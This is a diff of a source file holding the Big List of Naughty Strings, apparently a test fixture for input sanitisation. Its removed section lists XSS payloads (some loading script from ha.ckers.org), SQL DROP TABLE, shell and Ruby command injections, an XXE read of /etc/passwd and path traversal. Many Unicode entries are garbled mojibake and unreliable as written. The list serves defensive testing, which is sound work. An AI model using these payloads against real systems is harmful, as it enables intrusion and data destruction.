-"00ᅨルᅥヨ$-", - -// Unicode font -// -// Strings which contain bold/italic/etc. versions of normal characters - -"ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", -"ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ ンミンンミᄄンミᅠ", -"ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ ンヨノンヨヤンヨフ", -"ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ ンメナンメミンメネ", -"ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ ンモᆳンモᄌンモᄚ", -"ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ ンユユンユᅠンユリ", -"ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ ンレヘンレリンレミ", -"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ", - -// Script Injection -// -// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS - -"<script>alert(123)</script>", -"<script>alert('123');</script>", -"<img src=x onerror=alert(123) />", -"<svg><script>123<1>alert(123)</script>", -"\"><script>alert(123)</script>", -"'><script>alert(123)</script>", -"><script>alert(123)</script>", -"</script><script>alert(123)</script>", -"< / script >< script >alert(123)< / script >", -" onfocus=JaVaSCript:alert(123) autofocus", -"\" onfocus=JaVaSCript:alert(123) autofocus", -"' onfocus=JaVaSCript:alert(123) autofocus", -"ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", -"<sc<script>ript>alert(123)</sc</script>ript>", -"--><script>alert(123)</script>", -"\";alert(123);t=\"", -"';alert(123);t='", -"JavaSCript:alert(123)", -";alert(123);", -"src=JaVaSCript:prompt(132)", -"\"><script>alert(123);</script x=\"", -"'><script>alert(123);</script x='", -"><script>alert(123);</script x=", -"\" autofocus onkeyup=\"javascript:alert(123)", -"' autofocus onkeyup='javascript:alert(123)", -"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", -"'`\"><\\x3Cscript>javascript:alert(1)</script>", -"'`\"><\\x00script>javascript:alert(1)</script>", -"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", -"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", -"\"`'><script>\\x3Bjavascript:alert(1)</script>", -"\"`'><script>\\x0Djavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", -"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x09javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", -"\"`'><script>\\x00javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", -"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", -"\"`'><script>\\x0Cjavascript:alert(1)</script>", -"\"`'><script>\\x2Bjavascript:alert(1)</script>", -"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", -"\"`'><script>-javascript:alert(1)</script>", -"\"`'><script>\\x0Ajavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", -"\"`'><script>\\x7Ejavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", -"\"`'><script>\\xC2\\x85javascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x21javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", -"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", -"\"`'><script>\\x0Bjavascript:alert(1)</script>", -"\"`'><script>\\x20javascript:alert(1)</script>", -"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", -"<img \\x00src=x onerror=\"alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x12src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x10src=x onerror=\"javascript:alert(1)\">", -"<img\\x13src=x onerror=\"javascript:alert(1)\">", -"<img\\x32src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x34src=x onerror=\"javascript:alert(1)\">", -"<img \\x39src=x onerror=\"javascript:alert(1)\">", -"<img \\x00src=x onerror=\"javascript:alert(1)\">", -"<img src\\x09=x onerror=\"javascript:alert(1)\">", -"<img src\\x10=x onerror=\"javascript:alert(1)\">", -"<img src\\x13=x onerror=\"javascript:alert(1)\">", -"<img src\\x32=x onerror=\"javascript:alert(1)\">", -"<img src\\x12=x onerror=\"javascript:alert(1)\">", -"<img src\\x11=x onerror=\"javascript:alert(1)\">", -"<img src\\x00=x onerror=\"javascript:alert(1)\">", -"<img src\\x47=x onerror=\"javascript:alert(1)\">", -"<img src=x\\x09onerror=\"javascript:alert(1)\">", -"<img src=x\\x10onerror=\"javascript:alert(1)\">", -"<img src=x\\x11onerror=\"javascript:alert(1)\">", -"<img src=x\\x12onerror=\"javascript:alert(1)\">", -"<img src=x\\x13onerror=\"javascript:alert(1)\">", -"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", -"<img src=x onerror=\\x09\"javascript:alert(1)\">", -"<img src=x onerror=\\x10\"javascript:alert(1)\">", -"<img src=x onerror=\\x11\"javascript:alert(1)\">", -"<img src=x onerror=\\x12\"javascript:alert(1)\">", -"<img src=x onerror=\\x32\"javascript:alert(1)\">", -"<img src=x onerror=\\x00\"javascript:alert(1)\">", -"<a href=javascript:javascript:alert(1)>XXX</a>", -"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", -"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", -"<title onpropertychange=javascript:alert(1)></title><title title=>", -"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", -"<!--[if]><script>javascript:alert(1)</script -->", -"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", -"<script src=\"/\%(jscript)s\"></script>", -"<script src=\"\\%(jscript)s\"></script>", -"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", -"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", -"<IMG SRC=# onmouseover=\"alert('xxs')\">", -"<IMG SRC= onmouseover=\"alert('xxs')\">", -"<IMG onmouseover=\"alert('xxs')\">", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=\"jav ascript:alert('XSS');\">", -"<IMG SRC=\"jav	ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", -"<IMG SRC=\"  javascript:alert('XSS');\">", -"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", -"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", -"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", -"<SCRIPT SRC=//ha.ckers.org/.j>", -"<IMG SRC=\"javascript:alert('XSS')\"", -"<iframe src=http://ha.ckers.org/scriptlet.html <", -"\\\";alert('XSS');//", -"<u oncopy=alert()> Copy me</u>", -"<i onwheel=alert(1)> Scroll over me </i>", -"<plaintext>", -"http://a/%%30%30", -"</textarea><script>alert(123)</script>", - -// SQL Injection -// -// Strings which can cause a SQL injection if inputs are not sanitized - -"1;DROP TABLE users", -"1'; DROP TABLE users-- 1", -"' OR 1=1 -- 1", -"' OR '1'='1", -" ", -"%", -"_", - -// Server Code Injection -// -// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) - -"-", -"--", -"--version", -"--help", -"$USER", -"/dev/null; touch /tmp/blns.fail ; echo", -"`touch /tmp/blns.fail`", -"$(touch /tmp/blns.fail)", -"@{[system \"touch /tmp/blns.fail\"]}", - -// Command Injection (Ruby) -// -// Strings which can call system commands within Ruby/Rails applications - -"eval(\"puts 'hello world'\")", -"System(\"ls -al /\")", -"`ls -al /`", -"Kernel.exec(\"ls -al /\")", -"Kernel.exit(1)", -"%x('ls -al /')", - -// XXE Injection (XML) -// -// String which can reveal system files when parsed by a badly configured XML parser - -"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", - -// Unwanted Interpolation -// -// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. - -"$HOME", -"$ENV{'HOME'}", -"%d", -"%s", -"{0}", -"%*.*s", -"File:///", - -// File Inclusion -// -// Strings which can cause user to pull in files that should not be a part of a web server - -"../../../../../../../../../../../etc/passwd%00", -"../../../../../../../../../../../etc/hosts", - -// Known CVEs and Vulnerabilities -// -// Strings that test for known vulnerabilities - -"() { 0; }; touch /tmp/blns.shellshock1.fail;", -"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", -"<<< %s(un='%s') = %u", -"+++ATH0", - -// MSDOS/Windows Special Filenames -// -// Strings which are reserved characters in MSDOS/Windows - -"CON", -"PRN", -"AUX", -"CLOCK$", -"NUL", -"A:", -"ZZ:", -"COM1", -"LPT1", -"LPT2", -"LPT3", -"COM2", -"COM3", -"COM4", - -// IRC specific strings -// -// Strings that may occur on IRC clients that make security products freak out - -"DCC SEND STARTKEYLOGGER 0 0 0", - -// Scunthorpe Problem -// -// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) - -"Scunthorpe General Hospital", -"Penistone Community Church", -"Lightwater Country Park", -"Jimmy Clitheroe", -"Horniman Museum", -"shitake mushrooms", -"RomansInSussex.co.uk", -"http://www.cum.qc.ca/", -"Craig Cockburn, Software Specialist", -"Linda Callahan", -"Dr. Herman I. Libshitz", -"magna cum laude", -"Super Bowl XXX", -"medieval erection of parapets", -"evaluate", -"mocha", -"expression", -"Arsenal canal", -"classic", -"Tyson Gay", -"Dick Van Dyke", -"basement", - -// Human injection -// -// Strings which may cause human to reinterpret worldview - -"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.", - -// Terminal escape codes -// -// Strings which punish the fools who use cat/type on this file - -"Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", -"But now...[20Cfor my greatest trick...[8m", -"The quick brown fox... [Beeeep]", - -// iOS Vulnerabilities -// -// Strings which crashed iMessage in various versions of iOS - -"Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ", -"゚マᄈ0゚フネᄌマ" -};
\ No newline at end of file + // sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + + // Reserved Strings + // + // Strings which may be used elsewhere in code + + "undefined", "undef", "null", "NULL", "(null)", "nil", "NIL", "true", "false", "True", "False", "TRUE", "FALSE", "None", "hasOwnProperty", "\\", "\\\\", + + // Numeric Strings + // + // Strings which can be interpreted as numeric + + "0", "1", "1.00", "$1.00", "1/2", "1E2", "1E02", "1E+02", "-1", "-1.00", "-$1.00", "-1/2", "-1E2", "-1E02", "-1E+02", "1/0", "0/0", "-2147483648/-1", + "-9223372036854775808/-1", "-0", "-0.0", "+0", "+0.0", "0.00", "0..0", ".", "0.0.0", "0,00", "0,,0", ",", "0,0,0", "0.0/0", "1.0/0.0", "0.0/0.0", "1,0/0,0", + "0,0/0,0", "--1", "-", "-.", "-,", "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", "NaN", "Infinity", + "-Infinity", "INF", "1#INF", "-1#IND", "1#QNAN", "1#SNAN", "1#IND", "0x0", "0xffffffff", "0xffffffffffffffff", "0xabad1dea", + "123456789012345678901234567890123456789", "1,000.00", "1 000.00", "1'000.00", "1,000,000.00", "1 000 000.00", "1'000'000.00", "1.000,00", "1 000,00", + "1'000,00", "1.000.000,00", "1 000 000,00", "1'000'000,00", "01000", "08", "09", "2.2250738585072011e-308", + + // Special Characters + // + // ASCII punctuation. All of these characters may need to be escaped in some + // contexts. Divided into three groups based on (US-layout) keyboard position. + + ",./;'[]\\-=", "<>?:\"{}|_+", "!@#$%^&*()`~", + + // Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, + // and U+007F (DEL) + // Often forbidden to appear in various text-based file formats (e.g. XML), + // or reused for internal delimiters on the theory that they should never + // appear in input. + // The next line may appear to be blank or mojibake in some viewers. + "", + + // Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. + // Commonly misinterpreted as additional graphic characters. + // The next line may appear to be blank, mojibake, or dingbats in some viewers. + "ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", + + // Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode + // version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), + // and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often + // treated as whitespace in some contexts. + // This file unfortunately cannot express strings containing + // U+0000, U+000A, or U+000D (NUL, LF, CR). + // The next line may appear to be blank or mojibake in some viewers. + // The next line may be flagged for \"trailing whitespace\" in some viewers. + " ", " ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", + + // Unicode additional control characters: all of the characters with + // general category Cf (in Unicode 8.0.0). + // The next line may appear to be blank or mojibake in some viewers. + "ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏ" + "ᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠ" + "タᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌ" + "ᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒ" + "ᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂ" + "ᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆ" + "ᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ" + "", + + // \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. + // The next two lines may appear to be blank or mojibake in some viewers. + "ᄏ", "ᄒ", + + // Unicode Symbols + // + // Strings which contain common unicode symbols (e.g. smart quotes) + + "ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", "ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", "ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", + "ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", + "ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", "ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", + "ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", "`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", + "¬ナロ¬ナワ¬ナン¬ナ゙", + "チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭ" + "ᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフ" + "ヘホマ", + "ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", + + // Unicode Subscript/Superscript/Accents + // + // Strings which contain unicode subscripts/superscripts; can cause rendering issues + + "¬チᄚ¬チᄡ¬チᄉ", "¬ツタ¬ツチ¬ツツ", 